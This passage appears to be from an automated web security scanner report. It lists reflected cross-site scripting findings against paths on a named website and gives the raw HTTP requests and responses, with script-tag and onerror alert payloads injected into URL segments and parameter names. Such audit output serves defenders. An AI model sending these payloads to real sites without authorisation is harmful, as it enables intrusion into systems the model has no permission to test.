GET /tag/telephoneb1135</title><img%20src%3da%20onerror%3dalert(1)>0633fcc96a6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: telephoneb1135</title><img src=a onerror=alert(1)>0633fcc96a6</title>
...[SNIP]...

2.4434. http://www.resellerbase.com/tag/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 208ef<script>alert(1)</script>43fffa7c483 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag208ef<script>alert(1)</script>43fffa7c483/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag208ef<script>alert(1)</script>43fffa7c483/themes/ was not found on this server.</p>
...[SNIP]...

2.4435. http://www.resellerbase.com/tag/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7dddc<a>3d0248aaf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes7dddc<a>3d0248aaf0/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes7dddc<a>3d0248aaf0/ was not found on this server.</p>
...[SNIP]...

2.4436. http://www.resellerbase.com/tag/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4051c<script>alert(1)</script>60fb7b2d50d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/themes/?4051c<script>alert(1)</script>60fb7b2d50d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/?4051c<script>alert(1)</script>60fb7b2d50d=1 was not found on this server.</p>
...[SNIP]...

2.4437. http://www.resellerbase.com/tag/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 42154<script>alert(1)</script>775cf5e37a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag42154<script>alert(1)</script>775cf5e37a3/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag42154<script>alert(1)</script>775cf5e37a3/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4438. http://www.resellerbase.com/tag/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b95ca<a>8c2fb45bece was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themesb95ca<a>8c2fb45bece/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themesb95ca<a>8c2fb45bece/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4439. http://www.resellerbase.com/tag/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 32f98<a>4dfd8c99404 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmos32f98<a>4dfd8c99404/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos32f98<a>4dfd8c99404/ was not found on this server.</p>
...[SNIP]...

2.4440. http://www.resellerbase.com/tag/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 332d3<script>alert(1)</script>405f428f184 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/themes/kosmos/?332d3<script>alert(1)</script>405f428f184=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/?332d3<script>alert(1)</script>405f428f184=1 was not found on this server.</p>
...[SNIP]...

2.4441. http://www.resellerbase.com/tag/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 70689<script>alert(1)</script>1748e7bb198 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag70689<script>alert(1)</script>1748e7bb198/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag70689<script>alert(1)</script>1748e7bb198/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4442. http://www.resellerbase.com/tag/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 621c3<a>ab6a65fd8f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes621c3<a>ab6a65fd8f1/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes621c3<a>ab6a65fd8f1/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4443. http://www.resellerbase.com/tag/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 85653<a>c3a1ada77 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmos85653<a>c3a1ada77/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos85653<a>c3a1ada77/images/ was not found on this server.</p>
...[SNIP]...

2.4444. http://www.resellerbase.com/tag/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dfd04<a>d2b98a93a8d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmos/imagesdfd04<a>d2b98a93a8d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/imagesdfd04<a>d2b98a93a8d/ was not found on this server.</p>
...[SNIP]...

2.4445. http://www.resellerbase.com/tag/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6f576<script>alert(1)</script>03e1c27e89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/themes/kosmos/images/?6f576<script>alert(1)</script>03e1c27e89=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/images/?6f576<script>alert(1)</script>03e1c27e89=1 was not found on this server.</p>
...[SNIP]...

2.4446. http://www.resellerbase.com/tag/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8bb68<script>alert(1)</script>75e5cb99088 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag8bb68<script>alert(1)</script>75e5cb99088/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag8bb68<script>alert(1)</script>75e5cb99088/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4447. http://www.resellerbase.com/tag/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6dd77<a>df9039f0777 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes6dd77<a>df9039f0777/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes6dd77<a>df9039f0777/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4448. http://www.resellerbase.com/tag/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b447d<a>c09739749e8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmosb447d<a>c09739749e8/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmosb447d<a>c09739749e8/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4449. http://www.resellerbase.com/tag/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c0789<a>1720c956a24 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmos/imagesc0789<a>1720c956a24/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/imagesc0789<a>1720c956a24/rating/ was not found on this server.</p>
...[SNIP]...

2.4450. http://www.resellerbase.com/tag/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7ccae<a>7d884378ca2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmos/images/rating7ccae<a>7d884378ca2/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/images/rating7ccae<a>7d884378ca2/ was not found on this server.</p>
...[SNIP]...

2.4451. http://www.resellerbase.com/tag/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b86bb<script>alert(1)</script>ea02d362aff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/themes/kosmos/images/rating/?b86bb<script>alert(1)</script>ea02d362aff=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/images/rating/?b86bb<script>alert(1)</script>ea02d362aff=1 was not found on this server.</p>
...[SNIP]...

2.4452. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20ea2<script>alert(1)</script>5252f849e6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag20ea2<script>alert(1)</script>5252f849e6a/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

